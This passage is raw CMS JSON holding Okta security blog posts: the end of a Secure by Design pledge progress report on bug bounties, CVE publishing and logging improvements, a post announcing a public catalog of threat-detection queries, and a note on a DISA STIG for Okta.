\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/vulnerability-reporting-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"vulnerability reporting policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/sites/default/files/2024-08/Okta_Vulnerability_Disclosure_Policy_v2.0.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosure policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From May 2024 to May 2025, Okta triaged 153 valid issues submitted via bug bounty programs and paid out $405,801 in total rewards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran several “bounty reward multiplier” campaigns in which vulnerability researchers were paid double, and in some cases triple the financial reward for finding vulnerabilities in specific products. This attracted a number of new security researchers to our bug bounty program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate transparency in vulnerability reporting by including accurate Common Weakness Enumeration (CWE) and Common Platform Enumeration (CPE) fields in every Common Vulnerabilities and Exposures (CVE) record for the manufacturer’s products. Additionally, issue CVEs in a timely manner for, at minimum, all critical or high-impact vulnerabilities that either require actions by a customer to patch or have evidence of active exploitation.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has formalized our approach to sharing vulnerability information with customers during the term of the pledge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We continue to remediate vulnerabilities discovered in Okta products in accordance with the contractual terms entered into with customers. Okta publishes CVEs when a vulnerability discovered in an Okta component requires action on the part of an Okta customer. Okta is a CVE Numbering Authority (CNA) authorized by CISA and MITRE to publish vulnerability information as CVE (Common Vulnerabilities and Exposures) bulletins. CVE bulletins for customer-installed Okta clients and agents are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://trust.okta.com/security-advisories/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published online\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has also revised its process for notifying customers of vulnerability information for a broader set of vulnerability types. All reported vulnerabilities are subject to both a technical assessment and an assessment of potential customer impact.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Okta products provide mechanisms for administrators to troubleshoot access issues and for security teams to monitor for suspicious activity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, logged events include authentication and application access events, administrator and user actions, session context, and information on the source and target of an action. We recommend reading the table provided in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/cisasecurebydesign1/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"half-yearly update\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to learn more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta made measurable improvements to logging of both the Okta and Auth0 platforms, which are detailed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" now includes over 1000 unique events\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can generate queries for new events related to Okta Desktop MFA, Okta Privileged Access, Okta Identity Governance, Identity Verification, Enhanced Disaster Recovery, Device Assurance, Identity Threat Protection, Workflows and Universal Directory.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/rootsessionidroottokenid/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root session and token context\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in all relevant System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can easily group all interactive user events to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootSessionId\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" property and all calls made using a given API token to a rootApiTokenId property\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration changes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in the target object of all relevant System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and Security personnel can use the changeDetails property to quickly identify in System Log the prior and current state when administrators modify critical policy settings (IdP, directory agent, password policies, authentication policies etc).. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/reports/mfa-abandonment.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA abandonment \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"events added to System Log\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and Security personnel are better able to troubleshoot technical issues or MFA Fatigue attacks.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 System Log Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admins can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/security-alerts\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create and modify thresholds\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for notifications in Auth0 Security Center\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can set thresholds for suspicious activity above which alerts can be configured, ensuring a prompt response to genuine incidents and fewer false alarms.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/changelog#1Yusq2sGxZU8e0ek2VQKfK\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 Dashboard Session Management\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can manually revoke a user’s sessions from the management console.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/prioritized-log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prioritized Log Streams\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can optimize the performance of security-relevant events over others.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Final word\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From the moment we signed the CISA Secure by Design pledge, Okta’s Product, Engineering and Security teams were enthusiastic about tackling this important work. The pledge was highly aligned with one of Okta’s four core values (“Always Secure, Always On.”). And every Okta employee is incentivized to lean into our security program under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - our long-term initiative to lead the industry in the fight against Identity-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One key benefit of CISA’s approach was in asking signatories to demonstrate progress. This meant that even in areas where our controls were mature, we could still challenge the business to demonstrate further improvements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the more challenging conversations was around our “definition of done” for some of these programs. We observed that the quantum of effort required to close out the final 5-10% of coverage for any given control almost always required more resources than the first 90-95%. The support required to manage exception processes and the engineering required to handle edge use cases was the most taxing on our teams. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the ambitious milestones we put forward, I’m very proud of all the people at Okta who collaborated, made concessions, and, in many cases, innovated to help meet our Secure by Design pledge goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As mentioned at the halfway point in this exercise, Secure by Design is never “done.” Okta is passionate about security - especially the security features all cloud applications need to support - to meet our larger, more ambitious goal of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/oktas-mission-to-standardize-identity-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"eliminating identity-based attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"A one-year progress update on Okta's commitment to the CISA Secure by Design Pledge."},"updatedAt":"2025-05-28T16:02:25.114Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2025/05/leveraging-okta-syslogs-for-proactive-threat-detection","id":"f142328d-069a-522a-b0ca-7963b254a834","title":"Leveraging Okta System Logs for Proactive Threat Detection","date":"2025-05-20T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is thrilled to announce the launch of our Customer Detection Catalog, a repository of detection queries designed to help Okta customers proactively identify and respond to potential security threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This publicly accessible GitHub repository, found at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://github.com/okta/customer-detections\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", offers a growing collection of pre-built queries, contributed by Okta personnel and the wider security community, that surface suspicious activities ranging from anomalous user behavior and potential account takeovers to misconfigurations and emerging attack patterns. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of these detections were built while analyzing real cyber threats against Okta tenants. The detections also contain preventative configurations Okta administrators can implement to proactively mitigate the threat that’s being detected. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When paired with the broader \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (numbering over 1000 events), the Okta Customer Detection Catalog is a versatile resource designed to provide SOC analysts with readily usable queries to integrate into their monitoring and alerting workflows, enabling faster identification of potential incidents. It also offers threat hunters a foundation for building and customizing more sophisticated detection rules tailored to their specific environment and risk appetite. Detailed descriptions of security-relevant log fields are also available to help security analysts interpret logs during an investigation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here are a few example detections that highlight the potential of the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Impossible Travel with New Device\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": This detection looks for authentication events originating from geographically distant locations within a short timeframe, coupled with the use of a previously unseen device for the user. This can be a strong indicator of account takeover.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Okta Administrator Activity: \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Unusual activity conducted by an administrator such as deactivating all other super administrators to prevent response, disabling log streams to prevent detection, or downgrading MFA on authentication policies. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Access from Tor Exit Nodes\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Identifying access attempts to sensitive applications originating from Tor exit nodes can flag potentially anonymized and suspicious activity.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection Queries vs. Hunting Queries\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The repository makes a distinction between detection queries and hunting queries, both of which reside in different folders within the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection queries are designed for continuous monitoring and alerting. They are typically more specific and aim to identify high-confidence indicators of malicious activity or policy violations. When a detection query triggers, it ideally generates an alert for immediate investigation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Hunting queries are more exploratory and are used for proactive investigations. They might look for broader patterns or anomalies that don't necessarily trigger immediate alerts but warrant further analysis by a threat hunter. Hunting queries can help uncover stealthy or sophisticated attacks that might evade standard detections.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers should baseline these detections against their environment and filter out business approved processes that may cause false positives. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your Contribution Matters\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we believe that by sharing knowledge and expertise, our whole community can become more resilient against evolving threats. The community-driven nature of the catalog allows for the rapid dissemination of detection strategies for newly identified vulnerabilities and attack techniques.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We actively encourage customers to contribute your own detection ideas to this growing repository. If you see a gap in our current coverage, or find any issues, make a Github Issue to have it addressed. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To contribute new detection ideas, create a Github issue and include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What activity is the idea attempting to detect? \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can this be leveraged by an adversary?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What Mitre ATT&CK TTP does it map to?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Add the detection query/logic.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Indicate whether you would like to be credited as the author\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Happy hunting!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brett Winterford contributed to this post.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Introducing the Okta Security Detection Catalog, a repository of detection queries designed to help Okta customers."},"updatedAt":"2025-05-22T00:26:15.598Z","secAuthor":[{"id":"e683d13a-ed28-56b7-9833-acd324958d57","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg"},"name":"Ryan Mombourquette","jobTitle":"Detection and Response Engineer","slug":"/hackers/ryan-mombourquette","node_locale":"en"}]},{"slug":"/articles/2025/05/oktas-new-stig","id":"0e97e210-79c2-50a3-83e8-0a4e7e2cd924","title":"Okta's new Security Technical Implementation Guide (STIG)","date":"2025-05-09T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In cybersecurity, identity is the first line of defense. As the number of applications and systems increases, the fatigue of the cyber workforce increases in parallel. Exacerbating this is the increased responsibility on customers to create secure baselines where none exist.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Securing Baselines\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In an effort to create secure baselines, organizations like the Defense Information Systems Agency (DISA) have built publicly available guidance in the form of DISA Security Technical Implementation Guides (STIG). STIGs and Security Requirements Guides for the Department of Defense (DOD) information technology systems are mandated by DODI 8500.01 and provide benefits across the industry. This guidance bridges the gap between the National Institute of Standards and Technology (NIST) Special Publication 800-53 and Risk Management Framework (RMF). STIGs offer significant benefits as it relates to improving IT system security, compliance and resilience.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta and DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta recently announced \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/announcement/disa-releases-the-okta-idaas-security-technical-implementation-guide/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"our partnership with DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", which has resulted in the release of the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG). \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"While this STIG is specific to Okta platforms, the integrations and hardening guidance are standards-based that can be used on any identity platform.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Industry-leader in Identity and Access Management (IAM), Okta is interoperable with various identity platforms and applications, which improves the ease of use when referencing the Okta STIG as a basis for other similar products in today's technological marketplace.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"first identity vendor to provide this level of configuration guidance\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", we look forward to continuing our relationship with DISA. By raising the bar for the industry, we're helping create the strongest and most secure guidance possible for securing not only the Okta platforms — but everything they connect to.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Call to Action\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"With the release of this guidance, we encourage all of our customers to evaluate their Okta orgs against the STIG. While some checks such as \\\"banner notifications\\\" may not apply to commercial entities, the remainder of the checks include recommendations for the utmost secure configuration of the Okta platforms.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) is available to download at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/stigs/downloads/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"https://public.cyber.mil/stigs/downloads/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", search for Okta. If you have feedback on the STIG, please contact fedramp@okta.com.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta recently announced our partnership with DISA, which has resulted in the release of the Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) an an effort to secure baselines for the industry."},"updatedAt":"2025-05-09T15:00:07.712Z","secAuthor":[{"id":"96970804-8b58-5b39-9146-0928bc8a399b","bio":{"bio":"
